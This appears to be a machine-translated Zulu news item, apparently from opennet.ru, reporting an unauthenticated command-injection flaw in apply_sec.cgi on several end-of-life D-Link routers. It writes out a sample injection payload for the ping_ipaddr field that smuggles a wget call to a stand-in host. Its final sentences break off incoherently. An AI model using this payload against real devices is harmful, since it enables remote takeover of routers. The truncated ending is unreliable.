Kumarutha angenawaya e-D-Link
Kuyathakazelisa ukuthi ngokusho kwabathuthukisi be-firmware, ucingo lwe-"ping_test" kufanele lwenziwe kuphela ngemuva kokuqinisekiswa, kodwa empeleni lubizwa kunoma yikuphi, kungakhathaliseki ukuthi ungene ngemvume ku-interface yewebhu. Ikakhulukazi, lapho ufinyelela isikripthi se-apply_sec.cgi futhi udlula ipharamitha ethi “action=ping_test”, iskripthi siqondisa kabusha ekhasini lokuqinisekisa, kodwa ngesikhathi esifanayo senza isenzo esihlotshaniswa ne-ping_test. Ukuze kusetshenziswe ikhodi, kusetshenziswe okunye ubungozi ku-ping_test ngokwayo, okubiza insiza ye-ping ngaphandle kokuhlola kahle ukulunga kwekheli lasesizindeni se-inthanethi elithunyelwe ukuze lihlolwe. Isibonelo, ukushayela insiza ye-wget futhi udlulisele imiphumela yomyalo we-“echo 1234” kumsingathi wangaphandle, vele ucacise ipharamitha “ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".
Ukuba sengozini kuqinisekiswe ngokusemthethweni kumamodeli alandelayo:
- I-DIR-655 ene-firmware 3.02b05 noma ngaphezulu;
- I-DIR-866L ene-firmware 1.03b04 noma ngaphezulu;
- I-DIR-1565 ene-firmware 1.01 noma ngaphezulu;
- I-DIR-652 (alukho ulwazi mayelana nezinguqulo ze-firmware eziyinkinga ezinikeziwe)
Isikhathi sokusekela kulawa mamodeli sesivele siphelelwe yisikhathi, ngakho-ke i-D-Link
Kamuva kwatholakala ukuthi usengozini futhi
Source: opennet.ru